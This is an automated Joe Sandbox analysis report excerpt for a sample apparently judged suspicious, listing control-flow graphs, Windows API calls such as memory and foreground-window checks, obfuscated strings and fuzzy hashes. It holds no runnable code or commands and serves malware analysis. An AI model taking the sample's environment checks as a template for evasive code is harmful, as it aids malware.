                                                                                                                                      control_flow_graph 633 79df82-79dfaf call 7993c0 CoUninitialize 636 79dfb0-79e003 633->636 636->636 637 79e005-79e01b 636->637 638 79e020-79e042 637->638 638->638 639 79e044-79e087 638->639 640 79e090-79e0eb 639->640 640->640 641 79e0ed-79e0f7 640->641 642 79e0f9-79e0ff 641->642 643 79e10b-79e116 641->643 644 79e100-79e109 642->644 645 79e118-79e11f 643->645 646 79e12d-79e130 643->646 644->643 644->644 648 79e120-79e129 645->648 647 79e133-79e13d 646->647 650 79e15d 647->650 651 79e13f-79e144 647->651 648->648 649 79e12b 648->649 649->647 653 79e15f-79e16c 650->653 652 79e150-79e159 651->652 652->652 654 79e15b 652->654 655 79e17b-79e183 653->655 656 79e16e-79e16f 653->656 654->653 658 79e19d 655->658 659 79e185-79e18b 655->659 657 79e170-79e179 656->657 657->655 657->657 661 79e1a0-79e1ac 658->661 660 79e190-79e199 659->660 660->660 664 79e19b 660->664 662 79e1ae 661->662 663 79e1c1-79e276 661->663 665 79e1b0-79e1bd 662->665 666 79e280-79e2bc 663->666 664->661 665->665 667 79e1bf 665->667 666->666 668 79e2be-79e2df 666->668 667->663 669 79e2e0-79e300 668->669 669->669 670 79e302-79e34f call 79b350 call 7993c0 CoUninitialize 669->670 675 79e350-79e3a3 670->675 675->675 676 79e3a5-79e3bb 675->676 677 79e3c0-79e3e2 676->677 677->677 678 79e3e4-79e427 677->678 679 79e430-79e48b 678->679 679->679 680 79e48d-79e497 679->680 681 79e499-79e49f 680->681 682 79e4ab-79e4b6 680->682 683 79e4a0-79e4a9 681->683 684 79e4b8-79e4bf 682->684 685 79e4cd-79e4d0 682->685 683->682 683->683 686 79e4c0-79e4c9 684->686 687 79e4d3-79e4dd 685->687 686->686 688 79e4cb 686->688 689 79e4fd 687->689 690 79e4df-79e4e4 687->690 688->687 692 79e4ff-79e50c 689->692 691 79e4f0-79e4f9 690->691 691->691 693 79e4fb 691->693 694 79e51b-79e523 692->694 695 79e50e-79e50f 692->695 693->692 697 79e53d 694->697 698 79e525-79e52b 694->698 696 79e510-79e519 695->696 696->694 696->696 700 79e540-79e54c 697->700 699 79e530-79e539 698->699 699->699 701 79e53b 699->701 702 79e54e 700->702 703 79e561-79e616 700->703 701->700 704 79e550-79e55d 702->704 705 79e620-79e65c 703->705 704->704 706 79e55f 704->706 705->705 707 79e65e-79e67f 705->707 706->703 708 79e680-79e6a0 707->708 708->708 709 79e6a2-79e6ba call 79b350 708->709 711 79e6bf-79e6d5 709->711
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Uninitialize
                                                                                                                                      • String ID: &GQw$V:V*$V:V*$us
                                                                                                                                      • API String ID: 3861434553-2648263849
                                                                                                                                      • Opcode ID: 4757a84ebf52e52726ae8578b0fd81c6c1d052ef6353eea143f1ca515675db78
                                                                                                                                      • Instruction ID: bf5f44515a8f39000948b9719fb5c1c0208ce0cac4bb462f8b443d5946bf2144
                                                                                                                                      • Opcode Fuzzy Hash: 4757a84ebf52e52726ae8578b0fd81c6c1d052ef6353eea143f1ca515675db78
                                                                                                                                      • Instruction Fuzzy Hash: 31220375245781CFD729CF29D490A22BFE2FFA6310B29869DC0D64F762D73A9806CB11

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 712 7acc00-7acc23 713 7acc2a-7acc44 712->713 714 7accbf-7acce6 712->714 715 7acca2-7accb8 712->715 716 7acc50-7acc6e call 7ad360 712->716 717 7acca0 712->717 718 7acc97-7acc9f 712->718 719 7acc75-7acc93 712->719 713->714 713->715 713->716 713->717 713->718 713->719 720 7accf0-7acd0d 714->720 715->714 715->715 715->716 715->717 715->718 715->719 716->715 716->717 716->718 716->719 718->717 719->718 720->720 723 7acd0f-7acd6f call 7a4d70 720->723 726 7acd70-7acd98 723->726 726->726 727 7acd9a-7acdeb call 7a4d70 726->727 730 7acdf0-7ace30 727->730 730->730 731 7ace32-7acebf call 7a4d70 730->731 734 7acec0-7acee2 731->734 734->734 735 7acee4-7acef9 call 7a4d70 734->735 737 7acefe-7acf31 735->737 738 7acf40-7acf54 737->738 738->738 739 7acf56-7acf90 call 7a4d70 738->739 742 7ad34e-7ad357 739->742 743 7ad31f 739->743 744 7ad33f 739->744 745 7ad330-7ad336 call 797fa0 739->745 746 7acf97-7acf9e 739->746 747 7ad325-7ad32f call 797fa0 739->747 748 7ad345-7ad34b call 797fa0 739->748 743->747 744->748 745->744 751 7acfa0-7acfa8 746->751 747->745 748->742 751->751 755 7acfaa-7acfc3 751->755 757 7acfcc 755->757 758 7acfc5-7acfca 755->758 759 7acfcf-7ad03f call 797f90 757->759 758->759 762 7ad040-7ad082 759->762 762->762 763 7ad084-7ad08f 762->763 764 7ad0b1-7ad0c2 763->764 765 7ad091-7ad096 763->765 767 7ad0e1-7ad0ef 764->767 768 7ad0c4-7ad0c8 764->768 766 7ad0a0-7ad0af 765->766 766->764 766->766 770 7ad0f0-7ad0f9 767->770 769 7ad0d0-7ad0df 768->769 769->767 769->769 770->770 771 7ad0fb-7ad111 770->771 772 7ad120-7ad128 771->772 772->772 773 7ad12a-7ad148 772->773 774 7ad14a-7ad14f 773->774 775 7ad151-7ad153 773->775 776 7ad15a-7ad16c call 797f90 774->776 775->776 779 7ad16e-7ad173 776->779 780 7ad192-7ad1a4 776->780 781 7ad180-7ad190 779->781 782 7ad1b0-7ad1c9 780->782 781->780 781->781 782->782 783 7ad1cb-7ad20f 782->783 784 7ad210-7ad232 783->784 784->784 785 7ad234-7ad23d 784->785 786 7ad23f-7ad246 785->786 787 7ad263 785->787 788 7ad250-7ad25f 786->788 789 7ad267-7ad274 787->789 788->788 790 7ad261 788->790 791 7ad291-7ad2a3 789->791 792 7ad276-7ad27a 789->792 790->789 794 7ad2b0-7ad2d8 791->794 793 7ad280-7ad28f 792->793 793->791 793->793 794->794 795 7ad2da-7ad316 call 7b1740 794->795 795->743
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7($;<$d}$f$p c"$rs$twia
                                                                                                                                      • API String ID: 0-3111116717
                                                                                                                                      • Opcode ID: ea49c4f26797140a9245fe4e0a12286a238b98242efa492262ddb737fb6ad54e
                                                                                                                                      • Instruction ID: 142664db3ddcb8f2ed3a8075043bfdeb7db74f9c5ac3bfef7f05769ec9f9c300
                                                                                                                                      • Opcode Fuzzy Hash: ea49c4f26797140a9245fe4e0a12286a238b98242efa492262ddb737fb6ad54e
                                                                                                                                      • Instruction Fuzzy Hash: 0612C07260C3009BC718DF69D89166BB7E2EFD6314F08992CF4C68B251E739D909CB96

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 798 79c9fc-79ca0f 799 79ca10-79ca3d 798->799 799->799 800 79ca3f-79ca65 call 798550 799->800 803 79ca70-79ca97 800->803 803->803 804 79ca99-79cadf 803->804 805 79cae0-79cb13 804->805 805->805 806 79cb15-79cb1d 805->806 807 79cb3b-79cb46 806->807 808 79cb1f-79cb26 806->808 810 79cb48-79cb49 807->810 811 79cb5b-79cb63 807->811 809 79cb30-79cb39 808->809 809->807 809->809 812 79cb50-79cb59 810->812 813 79cb7b-79cb83 811->813 814 79cb65-79cb66 811->814 812->811 812->812 816 79cbad 813->816 817 79cb85-79cb89 813->817 815 79cb70-79cb79 814->815 815->813 815->815 819 79cbb0-79cc68 816->819 818 79cb90-79cb99 817->818 818->818 821 79cb9b 818->821 820 79cc70-79cca5 819->820 820->820 822 79cca7-79cccb 820->822 821->819 823 79ccd0-79cd36 822->823 823->823 824 79cd38-79cd81 call 79b350 823->824 827 79cd90-79cdbd 824->827 827->827 828 79cdbf-79cde7 call 798550 827->828 831 79cdf0-79ce12 828->831 831->831 832 79ce14-79ce59 831->832 833 79ce60-79ce94 832->833 833->833 834 79ce96-79cea1 833->834 835 79cebb-79cec3 834->835 836 79cea3-79cea6 834->836 837 79cedb-79cee3 835->837 838 79cec5-79cec6 835->838 839 79ceb0-79ceb9 836->839 841 79cefb-79cf06 837->841 842 79cee5-79cee8 837->842 840 79ced0-79ced9 838->840 839->835 839->839 840->837 840->840 844 79cf08-79cf09 841->844 845 79cf1b-79cfe7 841->845 843 79cef0-79cef9 842->843 843->841 843->843 846 79cf10-79cf19 844->846 847 79cff0-79d025 845->847 846->845 846->846 847->847 848 79d027-79d054 847->848 849 79d060-79d0c6 848->849 849->849 850 79d0c8-79d0e4 call 79b350 849->850 852 79d0e9-79d0ff 850->852
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: &]>_$D$sK@C$sK@C$MO$Q?S
                                                                                                                                      • API String ID: 0-550075371
                                                                                                                                      • Opcode ID: baf6ccd1dc5d21ea5d017a3664d8105dca72a131acc5238bcf5ee56e74814815
                                                                                                                                      • Instruction ID: 9708236530e62413e1566630fb90672a7cb52ed94aa8b486d7ed332a621989f5
                                                                                                                                      • Opcode Fuzzy Hash: baf6ccd1dc5d21ea5d017a3664d8105dca72a131acc5238bcf5ee56e74814815
                                                                                                                                      • Instruction Fuzzy Hash: 4512F3B5240B418FC725CF2AD490A12BBE2FF96310B5986ADC4D68F766D738E806CF50

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 853 798670-798681 call 7cada0 856 79883c-79883e ExitProcess 853->856 857 798687-79868e call 7c4370 853->857 860 798694-7986cc GetCurrentProcessId GetCurrentThreadId 857->860 861 798837 call 7cb530 857->861 862 7986d9-7987a7 SHGetSpecialFolderPathW GetForegroundWindow 860->862 863 7986ce-7986d7 860->863 861->856 865 7987a9-7987d6 862->865 866 7987d8-79882b call 799870 862->866 863->862 865->866 866->861 869 79882d call 79c800 866->869 871 798832 call 79b320 869->871 871->861
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00798694
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0079869E
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0079874F
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0079879F
                                                                                                                                      • ExitProcess.KERNEL32 ref: 0079883E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                      • Opcode ID: 7d5f447fe53ef5dba06349d5100e1e2167f10e4ffbfebb194adee5ab50ab781a
                                                                                                                                      • Instruction ID: e040c488946738f54d16617752d0b0c601a79a66cc57b7a7bc9957d89db8d703
                                                                                                                                      • Opcode Fuzzy Hash: 7d5f447fe53ef5dba06349d5100e1e2167f10e4ffbfebb194adee5ab50ab781a
                                                                                                                                      • Instruction Fuzzy Hash: CD414737B443185BD748AEF9DC9536AB2C39BC4721F0A813D6A89D7385EDB8DC0582D1

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 873 7a6ed1-7a6f13 874 7a6f20-7a6f38 873->874 874->874 875 7a6f3a-7a6f5a call 791dc0 874->875 878 7a7043-7a7059 875->878 879 7a6f61-7a6f92 875->879 881 7a7079-7a7089 call 791df0 878->881 880 7a6fa0-7a6fdf 879->880 880->880 882 7a6fe1-7a703e call 7acc00 880->882 886 7a73ba 881->886 887 7a7279-7a7286 881->887 888 7a7090-7a70a3 call 791e00 881->888 889 7a7350 881->889 890 7a738a-7a73b1 call 7acc00 881->890 891 7a72eb-7a72f6 881->891 892 7a706c-7a7078 881->892 893 7a728d-7a7291 881->893 894 7a72a0 881->894 895 7a7360-7a7387 call 7acc00 881->895 896 7a7320-7a7330 call 797fa0 881->896 897 7a7340-7a7344 881->897 898 7a7060-7a7069 call 797fa0 881->898 899 7a72a6-7a72b1 881->899 902 7a73be-7a73d6 call 791f60 882->902 886->902 887->889 887->890 887->891 887->892 887->893 887->894 887->895 887->896 887->897 887->898 887->899 919 7a70f0 888->919 920 7a70a5-7a70a8 888->920 889->895 890->886 905 7a72f8-7a72ff 891->905 906 7a72e0 891->906 892->881 893->894 895->890 896->897 897->889 898->892 903 7a72b3-7a72b8 899->903 904 7a72d1-7a72d6 899->904 914 7a72c0-7a72cf 903->914 904->891 915 7a7300-7a730f 905->915 906->891 914->904 914->914 915->915 922 7a7311 915->922 925 7a70f2-7a70fe 919->925 923 7a70b9-7a70bb 920->923 922->906 926 7a70bd-7a70cb 923->926 927 7a70b0 923->927 928 7a7110 925->928 929 7a7100-7a7105 925->929 926->927 931 7a70cd-7a70d8 926->931 930 7a70b1-7a70b7 927->930 932 7a7117-7a7145 call 797f90 call 79a490 928->932 929->932 930->923 930->925 931->927 933 7a70da-7a70e3 931->933 939 7a714b-7a7162 call 797f90 932->939 940 7a7147-7a7149 932->940 933->930 935 7a70e5-7a70e8 933->935 935->930 943 7a7181-7a7198 939->943 944 7a7164-7a7169 939->944 940->939 946 7a71a0-7a71fc 943->946 945 7a7170-7a717f 944->945 945->943 945->945 946->946 947 7a71fe-7a7216 946->947 948 7a7218-7a7222 947->948 949 7a7250-7a7253 947->949 951 7a7230-7a723f 948->951 950 7a7257-7a7265 call 7cd920 949->950 954 7a726a-7a7272 950->954 951->951 952 7a7241 951->952 952->950 954->887 954->889 954->890 954->891 954->892 954->893 954->894 954->895 954->896 954->897 954->898 954->899
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @'I)$ech`$f#A%$twia$|p
                                                                                                                                      • API String ID: 0-4077543266
                                                                                                                                      • Opcode ID: 067c41fd57b0f6022d53f6380a21a81a386fe7fa9d89f66c1eabd18a74ba51ff
                                                                                                                                      • Instruction ID: 1c3b3b7f25ebec5dfab34473e8c1aecb08e568c74e12848fdfc40865dafa7258
                                                                                                                                      • Opcode Fuzzy Hash: 067c41fd57b0f6022d53f6380a21a81a386fe7fa9d89f66c1eabd18a74ba51ff
                                                                                                                                      • Instruction Fuzzy Hash: 58C1D2B2908351DBD7258F24D8826ABB7F1FFD6320F148A2DE89947351E7389901DB92
                                                                                                                                      APIs
                                                                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007BE2AF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                      • String ID: 8<=$j
                                                                                                                                      • API String ID: 3960555810-2099924815
                                                                                                                                      • Opcode ID: c5c0845fbaceb9bda5262d9eb57435e2d457a52d21bcb421976267f7ca9225bf
                                                                                                                                      • Instruction ID: 6c655a04283f6ec98b4ca4b90ece5ad08820c8d8c43d82147bf0ae288fbc3271
                                                                                                                                      • Opcode Fuzzy Hash: c5c0845fbaceb9bda5262d9eb57435e2d457a52d21bcb421976267f7ca9225bf
                                                                                                                                      • Instruction Fuzzy Hash: B7B1D27150C3D18AD729CF3984507EBBBE1AF97304F1889ADD4CA9B382D77949098B92
                                                                                                                                      APIs
                                                                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007BE2AF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                      • String ID: 8<=$j
                                                                                                                                      • API String ID: 3960555810-2099924815
                                                                                                                                      • Opcode ID: cd8a59575328fac9ffeee253f33d981b066efedc0507f4a9ef6c9d1e668883de
                                                                                                                                      • Instruction ID: 9a8d8d20b7786f1c1456cfefd6130fd2a5e4a78d575e07b24555abf2cf2a90f9
                                                                                                                                      • Opcode Fuzzy Hash: cd8a59575328fac9ffeee253f33d981b066efedc0507f4a9ef6c9d1e668883de
                                                                                                                                      • Instruction Fuzzy Hash: 90A1A07150C3918ED729CF3884507EBBBE1AF97304F1889ADD4CA9B382D7794949CB92
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ),ji$NJB@$_\t<$fmno
                                                                                                                                      • API String ID: 0-232877553
                                                                                                                                      • Opcode ID: 84d3e8ba597e995150ffc41407c30d4305bad8f40940a1cfcb5a5b62bac0616f
                                                                                                                                      • Instruction ID: 65d61b8031ac34fb35e8b84fcbde3d14e93e4b9a164633299108e818a833f431
                                                                                                                                      • Opcode Fuzzy Hash: 84d3e8ba597e995150ffc41407c30d4305bad8f40940a1cfcb5a5b62bac0616f
                                                                                                                                      • Instruction Fuzzy Hash: A8C114B260D3409BC724DF69A45126FBBE3EFC2310F18892DE4D58B341D679890ACB97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: b$k$l$m
                                                                                                                                      • API String ID: 0-1609332128
                                                                                                                                      • Opcode ID: 5a972d1227d1a8b0910c853fbb0f00890618417ccf9241051eb06068ef52e1be
                                                                                                                                      • Instruction ID: 353de6a32578c9a420e1258ab47d87033c8923328879ed3cd5b9979d95a984b2
                                                                                                                                      • Opcode Fuzzy Hash: 5a972d1227d1a8b0910c853fbb0f00890618417ccf9241051eb06068ef52e1be
                                                                                                                                      • Instruction Fuzzy Hash: E1A1243610C3808FD3208E2888D5B6FBBD2ABD5324F298A2EE5D5973D2D27DD845C706
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: UNC$UNC$UNC
                                                                                                                                      • API String ID: 0-536518775
                                                                                                                                      • Opcode ID: 1a31d42671b715a863adc4a2b93a3c4f12b47f1947e3bf773acb71a0eda0d21c
                                                                                                                                      • Instruction ID: e14eccc3579f9a7d0204edafcba62c38d87ec04d95f29a93b92d6e4da1f51f92
                                                                                                                                      • Opcode Fuzzy Hash: 1a31d42671b715a863adc4a2b93a3c4f12b47f1947e3bf773acb71a0eda0d21c
                                                                                                                                      • Instruction Fuzzy Hash: 36628EB0609B808ED325CB3C8855797BFE5AB5A324F044A5EE0FE873D2C7796101CB66
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: F771030F9526602D0EE189CCD4D6D92A$Fxz$|}~
                                                                                                                                      • API String ID: 0-1663953626
                                                                                                                                      • Opcode ID: 6fc38477bca4178b2224f942681f3eca8efc7eb0b16aea1a0fcd35021a78c4c7
                                                                                                                                      • Instruction ID: 27d6f527d8596098289578730ef63c44d9de21346b2352fd411b3c73f3171b05
                                                                                                                                      • Opcode Fuzzy Hash: 6fc38477bca4178b2224f942681f3eca8efc7eb0b16aea1a0fcd35021a78c4c7
                                                                                                                                      • Instruction Fuzzy Hash: DB612576710B428FC724CF39D891B66B7E3EF95304F19C96DD18A8B756EA38A801CB14
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: /./ $WVW(
                                                                                                                                      • API String ID: 2994545307-2734811727
                                                                                                                                      • Opcode ID: 9eb8b1b03867623ffca06a9143cf30ab4e86dfca55cb63ec7eae47214fd4ad89
                                                                                                                                      • Instruction ID: 534af80eb632711c71f5279758d1b1e0f7aad720ba29ca00256a324c79e7ae65
                                                                                                                                      • Opcode Fuzzy Hash: 9eb8b1b03867623ffca06a9143cf30ab4e86dfca55cb63ec7eae47214fd4ad89
                                                                                                                                      • Instruction Fuzzy Hash: EDB1F376B483118BC714CE29D881AABB7E2EBD5314F08CA3DE595C7395D638EC46C782
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(007CD73E,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007CB5DE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
